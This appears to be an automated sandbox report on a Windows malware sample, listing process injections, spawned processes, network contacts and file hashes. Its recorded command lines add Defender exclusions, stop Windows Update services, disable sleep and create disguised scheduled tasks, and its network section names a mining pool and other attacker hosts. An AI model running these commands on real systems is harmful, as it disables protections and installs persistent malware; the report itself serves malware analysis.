PID 5104 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5104 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2680 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2680 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4340 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4340 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4340 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2400 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2400 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 4736 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 4736 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 3572 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 3572 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 196 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 196 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe

"C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 292

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=37844 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataU8A8E" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataU8A8E" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataU8A8E\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataU8A8E" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffdc1f39758,0x7ffdc1f39768,0x7ffdc1f39778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1240 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1548 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=37844 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1844 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2152 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2520 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3044 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2176 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3340 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3280 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x254

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2108 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#gaydwxjuvlccdkkvygm#> powershell <#gaydwxjuvlccdkkvygm#> -Verb <#gaydwxjuvlccdkkvygm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 12:38 /f /tn MicrosoftEdgeTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 12:38 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 21.170.83.51.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 71.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 254.133.241.8.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.159.129.168:80 tcp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
N/A 127.0.0.1:37844 tcp
N/A 127.0.0.1:37844 tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
N/A 127.0.0.1:37844 tcp
GB 216.58.208.118:443 i.ytimg.com tcp
N/A 127.0.0.1:37844 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 118.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
NL 142.251.36.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 2.36.251.142.in-addr.arpa udp
GB 216.58.208.118:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
NL 142.251.36.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:80 pastebin.com tcp
US 172.67.34.170:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 254.135.241.8.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/4340-117-0x0000000001940000-0x0000000001969000-memory.dmp

memory/4340-118-0x0000000003500000-0x000000000353F000-memory.dmp

memory/4340-119-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/4340-120-0x0000000003B40000-0x0000000003B78000-memory.dmp

memory/4340-121-0x0000000073DD0000-0x00000000744BE000-memory.dmp

memory/4340-122-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-123-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-124-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-125-0x0000000006120000-0x000000000661E000-memory.dmp

memory/4340-126-0x0000000003690000-0x00000000036C4000-memory.dmp

memory/4340-127-0x00000000037D0000-0x00000000037D6000-memory.dmp

memory/4340-128-0x000000000BAA0000-0x000000000C0A6000-memory.dmp

memory/4340-129-0x000000000C0F0000-0x000000000C1FA000-memory.dmp

memory/4340-130-0x000000000C220000-0x000000000C232000-memory.dmp

memory/4340-131-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-132-0x000000000C240000-0x000000000C27E000-memory.dmp

memory/4340-133-0x000000000C2E0000-0x000000000C32B000-memory.dmp

memory/4340-134-0x0000000001940000-0x0000000001969000-memory.dmp

memory/4340-135-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/4340-137-0x0000000003500000-0x000000000353F000-memory.dmp

memory/4340-138-0x0000000073DD0000-0x00000000744BE000-memory.dmp

memory/4340-139-0x000000000C420000-0x000000000C496000-memory.dmp

memory/4340-140-0x000000000C4A0000-0x000000000C532000-memory.dmp

memory/4340-141-0x000000000C640000-0x000000000C6A6000-memory.dmp

memory/4340-142-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-143-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-144-0x000000000D0E0000-0x000000000D2A2000-memory.dmp

memory/4340-145-0x000000000DA90000-0x000000000DFBC000-memory.dmp

memory/4340-146-0x000000000D3E0000-0x000000000D430000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/5104-158-0x0000000000A20000-0x0000000000CAB000-memory.dmp

memory/5104-164-0x0000000000A20000-0x0000000000CAB000-memory.dmp

memory/3000-166-0x0000000000400000-0x0000000000527000-memory.dmp

memory/3000-173-0x0000000000400000-0x0000000000527000-memory.dmp

memory/3000-175-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-176-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-177-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-180-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-181-0x00000000FE850000-0x00000000FE860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2400-182-0x0000000000200000-0x0000000000834000-memory.dmp

memory/3000-184-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-183-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-189-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/5104-192-0x0000000000A20000-0x0000000000CAB000-memory.dmp

memory/2400-190-0x0000000000200000-0x0000000000834000-memory.dmp

memory/3000-193-0x00000000FE850000-0x00000000FE860000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

C:\Windows\Temp\setup.exe

